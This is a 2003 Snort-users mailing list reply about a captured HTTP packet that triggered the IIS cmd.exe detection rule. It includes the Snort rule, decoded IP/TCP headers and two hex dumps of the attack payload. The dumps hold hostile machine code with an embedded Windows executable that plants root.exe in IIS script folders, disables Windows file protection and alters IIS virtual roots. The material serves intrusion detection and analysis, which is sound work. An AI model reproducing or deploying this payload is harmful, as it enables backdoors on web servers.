Snort mailing list archives
Re: different CMD.exe access?!?
From: Phil Wood <cpw () cynosure lanl gov>
Date: Tue, 11 Mar 2003 12:08:13 -0700
Short answer: Yes. And, they are coming from Portugal and other countries as
well.
Long answer (with a request for additional information that should be include
in all queries of this type)
Attention all snort users. It will save at least three more emails on this
subject and any other subject if all of you folks, young and old, veterans
and newbies alike include the following in your email(examples relate to my OS):
1. SNORT VERSION:
% snort -V
Initializing Output Plugins!
-*> Snort! <*-
Version 2.0.0beta (Build 57)
By Martin Roesch (roesch () sourcefire com, www.snort.org)
2. THE RULE:
% grep "sid:[ ]*xxxx[ ]*;" rules/*.rules (where xxxx is the SID)
rules/web-iis.rules:alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"WEB-IIS cmd.exe access"; flow:to_server,established; content:"cmd.exe";
nocase; classtype:web-application-attack; sid:1002; rev:5;)
3. OPERATING SYSTEM:
% uname -s
Linux
4. TRACE (home grown from pcap file)
04:23:07.301975 219.240.31.43.52417 > 10.0.191.179.80: . 2014:3462(1448) ack 1 win 17520 <nop,nop,timestamp 903573427
2054612915> (DF)
RFC791: INTERNET PROTOCOL, September 1981
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| VER=4 | IHL=5 | ROU | | | | | | Total Length = 1500 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification = 10807 | |D| | Fragment Offset = 0 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| TTL=50 | Protocol = 6 | Header Checksum = 21526 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address = 219.240.31.43 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination Address = 10.0.191.179 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
RFC793: TRANSMISSION CONTROL PROTOCOL, September 1981
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port = 52417 | Destination Port = 80 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number = 840894308 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Acknowledgment Number = 1533835227 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| OFF=8 | | | | | | | |A| | | | | Window = 17520 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Checksum = 33332 | Urgent Pointer = 0 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Options
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 0x01 | 0x01 | 0x08 | 0x0a |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 0x35 | 0xdb | 0x6f | 0xb3 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 0x7a | 0x76 | 0xe7 | 0xb3 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Data
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
: 73457800 ff7590ff 55f88945 8cc38b45 : sEx u U E E :
: 8469c005 84080840 8945848d 84047856 : i @ E xV :
: 3412f7d8 c1c008c3 e8e1ffff ff3c0074 : 4 < t :
: f73cff74 f3c3e8ed ffffff8a f8e8e6ff : < t :
: ffff8ad8 c1e310e8 dcffffff 8af8e8d5 : :
: ffffff8a d8e8b4ff ffff83e0 07e82000 : :
: 0000ffff ffff00ff ffff00ff ffff00ff : :
: ffff00ff ffff0000 ffff0000 ffff0000 : :
: ffff598b 048123d8 f7d02385 58feffff : Y # # X :
: 0bd880fb 7f749f80 fbe0749a 3b9d58fe : t t ; X :
: ffff7492 c3680401 00008d85 5cfeffff : t h \ :
: 50ff55e0 8dbc055c feffffe8 09000000 : P U \ :
: 5c434d44 2e455845 005efca5 a5a4b363 : \CMD.EXE ^ c :
: 6a01e81c 00000064 3a5c696e 65747075 : j d:\inetpu :
: 625c7363 72697074 735c726f 6f742e65 : b\scripts\root.e :
: 7865008b 0c248819 8d855cfe ffff50ff : xe $ \ P :
: 55dc6a01 e82b0000 00643a5c 70726f67 : U j + d:\prog :
: 72617e31 5c636f6d 6d6f6e7e 315c7379 : ra~1\common~1\sy :
: 7374656d 5c4d5341 44435c72 6f6f742e : stem\MSADC\root. :
: 65786500 8b0c2488 198d855c feffff50 : exe $ \ P :
: ff55dce8 ba050000 fc4d5a50 00020000 : U MZP :
: 0004000f 00ffff00 00b80000 00000000 : :
: 0040001a fc000001 fcfcfcfc fcfc0000 : @ :
: 50450000 4c010300 fd2a2529 00000000 : PE L *%) :
: 00000000 e0008f81 0b010219 00040000 : :
: 00080000 00000000 00100000 00100000 : :
: 00200000 00004000 00100000 00040000 : @ :
: 01000000 00000000 03000a00 00000000 : :
: 00400000 00040000 00000000 02000000 : @ :
: 00001000 00200000 00001000 00100000 : :
: 00000000 10000000 00000000 00000000 : :
: 00300000 0c01fcfc fc000000 00000000 : 0 :
: 00000000 00000000 00000000 00000000 : :
: 00000000 10000000 10000000 04000000 : :
: 08000000 00000000 00000000 00000020 : :
: 00006000 00000000 00000000 10000000 : ' :
: 20000000 04000000 0c000000 00000000 : :
: 00000000 00000040 0000c000 00000000 : @ :
: 00000000 10000000 30000000 04000000 : 0 :
: 10000000 00000000 00000000 00000040 : @ :
: 0000c0fc fcfcfcfc fcfcfcfc fcfcfcfc : :
: fcfcfcfc fcfcfcfc fcfcfcfc fcfcfcfc : :
: fcfcfcfc fcfcfcfc fcfcfcfc fcfcfc00 : :
: 00000000 00000000 00000000 00000068 : h :
: 04010000 68d02040 00e86101 00008db8 : h @ a :
: d0204000 be002040 00a5a5a5 a56a0168 : @ @ j h :
: d0204000 e84c0100 00e80c00 000068c0 : @ L h :
: 270900e8 31010000 ebef68d8 24400068 : ' 1 h $@ h :
: 3f000f00 6a006810 20400068 02000080 : ? j h @ h :
: e8320100 000bc075 266a0468 54204000 : 2 u&j hT @ :
: 6a046a00 68482040 00ff35d8 244000e8 : j j hH @ 5 $@ :
: 0d010000 ff35d824 4000e80e 01000068 : 5 $@ h :
: d8244000 683f000f 006a0068 58204000 : $@ h? j hX @ :
: 68020000 80e8ed00 00000bc0 7555bd9c : h uU :
: 204000e8 4c000000 bda82040 00e84200 : @ L @ B :
: 00006a09 68b82040 006a016a 0068b020 : j h @ j j h :
: 4000ff35 d8244000 e8b40000 006a0968 : @ 5 $@ j h :
: c4204000 6a016a00 68b42040 00ff35d8 : @ j j h @ 5 :
: 244000e8 99000000 ff35d824 4000e89a : $@ 5 $@ :
: 000000c3 c705d024 40000004 000068d0 : $@ h :
: 24400068 d0204000 68d42440 006a0055 : $@ h @ h $@ j U :
: ff35d824 4000e860 0000000b c07549a1 : 5 $@ ' uI :
: d0244000 0bc07440 bed02040 00803e00 : $@ t@ @ > :
: 74364666 817efe2c 2c75f2c7 06323137 : t6Ff ~ ,,u 217 :
: 0081eecc 20400089 35d02440 00ff35d0 : @ 5 $@ 5 :
: 24400068 d0204000 6a016a00 55ff35d8 : $@ h @ j j U 5 :
: 244000e8 19000000 c3ff2560 304000ff : $@ %'0@ :
: 25643040 00ff2568 304000ff 25703040 : %d0@ %h0@ %p0@ :
: 00ff2574 304000ff 25783040 00ff257c : %t0@ %x0@ %| :
: 3040fcfc fcfcfcfc fcfcfcfc fcfcfcfc : 0@ :
: fcfcfcfc fc000000 00000000 00000000 : :
: 00005c45 58504c4f 5245522e 45584500 : \EXPLORER.EXE :
: 0000534f 46545741 52455c4d 6963726f : SOFTWARE\Micro :
: 736f6674 5c57696e 646f7773 204e545c : soft\Windows NT\ :
: 43757272 656e7456 65727369 6f6e5c57 : CurrentVersion\W :
: 696e6c6f 676f6e00 00005346 43446973 : inlogon SFCDis :
: 61626c65 00009dff ffff5359 5354454d : able SYSTEM :
: 5c437572 72656e74 436f6e74 726f6c53 : \CurrentControlS :
: 65745c53 65727669 6365735c 57335356 : et\Services\W3SV :
: 435c5061 72616d65 74657273 5c566972 : C\Parameters\Vir :
: 7475616c 20526f6f 74730000 00002f53 : tual Roots /S :
: 63726970 74730000 00002f4d 53414443 : cripts /MSADC :
: 00002f43 00002f44 0000633a 5c2c2c32 : /C /D c:\,,2 :
: 31370000 0000643a 5c2c2c32 3137fcfc : 17 d:\,,217 :
: fcfcfcfc fcfcfcfc fcfcfcfc fcfcfcfc : :
: fcfcfcfc fcfcfc00 00000000 00000000 : :
: 00000000 00000000 0000003c 30000000 : <0 :
: 00000000 00000084 30000060 3000004c : 0 '0 L :
: 30000000 00000000 00000091 30000070 : 0 0 p :
: 30000000 00000000 00000000 00000000 : 0 :
: 00000000 0000009e : :
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
On Tue, Mar 11, 2003 at 10:58:50AM -0500, John Hally wrote:
Hello, This is a different looking trace that tripped on the CMD.EXE rule. I usually see a bunch of ../../../cmd.exe, but this one looks different. Anyone else seeing this? it originated from 219.240.31.44, over in Korea: 000 : 61 6D 65 00 FF 75 BC FF 55 F8 89 45 98 E8 10 00 ame..u..U..E.... 010 : 00 00 57 53 41 47 65 74 4C 61 73 74 45 72 72 6F ..WSAGetLastErro 020 : 72 00 FF 75 BC FF 55 F8 89 45 94 E8 0B 00 00 00 r..u..U..E...... 030 : 55 53 45 52 33 32 2E 44 4C 4C 00 FF 55 F4 89 45 USER32.DLL..U..E 040 : 90 E8 0E 00 00 00 45 78 69 74 57 69 6E 64 6F 77 ......ExitWindow 050 : 73 45 78 00 FF 75 90 FF 55 F8 89 45 8C C3 8B 45 sEx..u..U..E...E 060 : 84 69 C0 05 84 08 08 40 89 45 84 8D 84 04 78 56 .i..... () E xV 070 : 34 12 F7 D8 C1 C0 08 C3 E8 E1 FF FF FF 3C 00 74 4............<.t 080 : F7 3C FF 74 F3 C3 E8 ED FF FF FF 8A F8 E8 E6 FF .<.t............ 090 : FF FF 8A D8 C1 E3 10 E8 DC FF FF FF 8A F8 E8 D5 ................ 0a0 : FF FF FF 8A D8 E8 B4 FF FF FF 83 E0 07 E8 20 00 .............. . 0b0 : 00 00 FF FF FF FF 00 FF FF FF 00 FF FF FF 00 FF ................ 0c0 : FF FF 00 FF FF FF 00 00 FF FF 00 00 FF FF 00 00 ................ 0d0 : FF FF 59 8B 04 81 23 D8 F7 D0 23 85 58 FE FF FF ..Y...#...#.X... 0e0 : 0B D8 80 FB 7F 74 9F 80 FB E0 74 9A 3B 9D 58 FE ....t....t.;.X. 0f0 : FF FF 74 92 C3 68 04 01 00 00 8D 85 5C FE FF FF ..t..h......\... 100 : 50 FF 55 E0 8D BC 05 5C FE FF FF E8 09 00 00 00 P.U....\........ 110 : 5C 43 4D 44 2E 45 58 45 00 5E FC A5 A5 A4 B3 63 \CMD.EXE.^.....c 120 : 6A 01 E8 1C 00 00 00 64 3A 5C 69 6E 65 74 70 75 j......d:\inetpu 130 : 62 5C 73 63 72 69 70 74 73 5C 72 6F 6F 74 2E 65 b\scripts\root.e 140 : 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50 FF xe...$....\...P. 150 : 55 DC 6A 01 E8 2B 00 00 00 64 3A 5C 70 72 6F 67 U.j..+...d:\prog 160 : 72 61 7E 31 5C 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 ra~1\common~1\sy 170 : 73 74 65 6D 5C 4D 53 41 44 43 5C 72 6F 6F 74 2E stem\MSADC\root. 180 : 65 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50 exe...$....\...P 190 : FF 55 DC E8 BA 05 00 00 FC 4D 5A 50 00 02 00 00 .U.......MZP.... 1a0 : 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 ................ 1b0 : 00 40 00 1A FC 00 00 01 FC FC FC FC FC FC 00 00 .@.............. 1c0 : 50 45 00 00 4C 01 03 00 FD 2A 25 29 00 00 00 00 PE..L....*%).... 1d0 : 00 00 00 00 E0 00 8F 81 0B 01 02 19 00 04 00 00 ................ 1e0 : 00 08 00 00 00 00 00 00 00 10 00 00 00 10 00 00 ................ 1f0 : 00 20 00 00 00 00 40 00 00 10 00 00 00 04 00 00 . ....@......... 200 : 01 00 00 00 00 00 00 00 03 00 0A 00 00 00 00 00 ................ 210 : 00 40 00 00 00 04 00 00 00 00 00 00 02 00 00 00 .@.............. 220 : 00 00 10 00 00 20 00 00 00 00 10 00 00 10 00 00 ..... .......... 230 : 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ................ 240 : 00 30 00 00 0C 01 FC FC FC 00 00 00 00 00 00 00 .0.............. 250 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 260 : 00 00 00 00 10 00 00 00 10 00 00 00 04 00 00 00 ................ 270 : 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ............... 280 : 00 00 60 00 00 00 00 00 00 00 00 00 10 00 00 00 ..`............. 290 : 20 00 00 00 04 00 00 00 0C 00 00 00 00 00 00 00 ............... 2a0 : 00 00 00 00 00 00 00 40 00 00 C0 00 00 00 00 00 .......@........ 2b0 : 00 00 00 00 10 00 00 00 30 00 00 00 04 00 00 00 ........0....... 2c0 : 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ...............@ 2d0 : 00 00 C0 FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 2e0 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 2f0 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC 00 ................ 300 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 ...............h 310 : 04 01 00 00 68 D0 20 40 00 E8 61 01 00 00 8D B8 ....h. @..a..... 320 : D0 20 40 00 BE 00 20 40 00 A5 A5 A5 A5 6A 01 68 . @... @.....j.h 330 : D0 20 40 00 E8 4C 01 00 00 E8 0C 00 00 00 68 C0 . @..L........h. 340 : 27 09 00 E8 31 01 00 00 EB EF 68 D8 24 40 00 68 '...1.....h.$@.h 350 : 3F 00 0F 00 6A 00 68 10 20 40 00 68 02 00 00 80 ?...j.h. @.h.... 360 : E8 32 01 00 00 0B C0 75 26 6A 04 68 54 20 40 00 .2.....u&j.hT @. 370 : 6A 04 6A 00 68 48 20 40 00 FF 35 D8 24 40 00 E8 j.j.hH @..5.$@.. 380 : 0D 01 00 00 FF 35 D8 24 40 00 E8 0E 01 00 00 68 .....5.$@......h 390 : D8 24 40 00 68 3F 00 0F 00 6A 00 68 58 20 40 00 .$@.h?...j.hX @. 3a0 : 68 02 00 00 80 E8 ED 00 00 00 0B C0 75 55 BD 9C h...........uU.. 3b0 : 20 40 00 E8 4C 00 00 00 BD A8 20 40 00 E8 42 00 @..L..... @..B. 3c0 : 00 00 6A 09 68 B8 20 40 00 6A 01 6A 00 68 B0 20 ..j.h. @.j.j.h. 3d0 : 40 00 FF 35 D8 24 40 00 E8 B4 00 00 00 6A 09 68 @..5.$@......j.h 3e0 : C4 20 40 00 6A 01 6A 00 68 B4 20 40 00 FF 35 D8 . @.j.j.h. @..5. 3f0 : 24 40 00 E8 99 00 00 00 FF 35 D8 24 40 00 E8 9A $@.......5.$@... 400 : 00 00 00 C3 C7 05 D0 24 40 00 00 04 00 00 68 D0 .......$@.....h. 410 : 24 40 00 68 D0 20 40 00 68 D4 24 40 00 6A 00 55 $@.h. @.h.$@.j.U 420 : FF 35 D8 24 40 00 E8 60 00 00 00 0B C0 75 49 A1 .5.$@..`.....uI. 430 : D0 24 40 00 0B C0 74 40 BE D0 20 40 00 80 3E 00 .$@...t@.. @..>. 440 : 74 36 46 66 81 7E FE 2C 2C 75 F2 C7 06 32 31 37 t6Ff.~.,,u...217 450 : 00 81 EE CC 20 40 00 89 35 D0 24 40 00 FF 35 D0 .... @..5.$@..5. 460 : 24 40 00 68 D0 20 40 00 6A 01 6A 00 55 FF 35 D8 $@.h. @.j.j.U.5. 470 : 24 40 00 E8 19 00 00 00 C3 FF 25 60 30 40 00 FF $@........%`0@.. 480 : 25 64 30 40 00 FF 25 68 30 40 00 FF 25 70 30 40 %d0@..%h0@..%p0@ 490 : 00 FF 25 74 30 40 00 FF 25 78 30 40 00 FF 25 7C ..%t0@..%x0@..%| 4a0 : 30 40 FC FC FC FC FC FC FC FC FC FC FC FC FC FC 0@.............. 4b0 : FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00 00 ................ 4c0 : 00 00 5C 45 58 50 4C 4F 52 45 52 2E 45 58 45 00 ..\EXPLORER.EXE. 4d0 : 00 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F ..SOFTWARE\Micro 4e0 : 73 6F 66 74 5C 57 69 6E 64 6F 77 73 20 4E 54 5C soft\Windows NT\ 4f0 : 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 57 CurrentVersion\W 500 : 69 6E 6C 6F 67 6F 6E 00 00 00 53 46 43 44 69 73 inlogon...SFCDis 510 : 61 62 6C 65 00 00 9D FF FF FF 53 59 53 54 45 4D able......SYSTEM 520 : 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 \CurrentControlS 530 : 65 74 5C 53 65 72 76 69 63 65 73 5C 57 33 53 56 et\Services\W3SV 540 : 43 5C 50 61 72 61 6D 65 74 65 72 73 5C 56 69 72 C\Parameters\Vir 550 : 74 75 61 6C 20 52 6F 6F tual Roo ------------------------------------------------------- This SF.net email is sponsored by:Crypto Challenge is now open! Get cracking and register here for some mind boggling fun and the chance of winning an Apple iPod: http://ads.sourceforge.net/cgi-bin/redirect.pl?thaw0031en _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list
-- Phil Wood, cpw () lanl gov ------------------------------------------------------- This SF.net email is sponsored by:Crypto Challenge is now open! Get cracking and register here for some mind boggling fun and the chance of winning an Apple iPod: http://ads.sourceforge.net/cgi-bin/redirect.pl?thaw0031en _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- different CMD.exe access?!? John Hally (Mar 11)
- Re: different CMD.exe access?!? Bamm Visscher (Mar 11)
- Re: different CMD.exe access?!? Jason (Mar 14)
- Re: different CMD.exe access?!? Phil Wood (Mar 11)
- Re: different CMD.exe access?!? Paul Schmehl (Mar 11)
- <Possible follow-ups>
- RE: different CMD.exe access?!? L. Christopher Luther (Mar 11)
- RE: different CMD.exe access?!? Ricardo, Gerson (Mar 14)
- Re: different CMD.exe access?!? Bamm Visscher (Mar 11)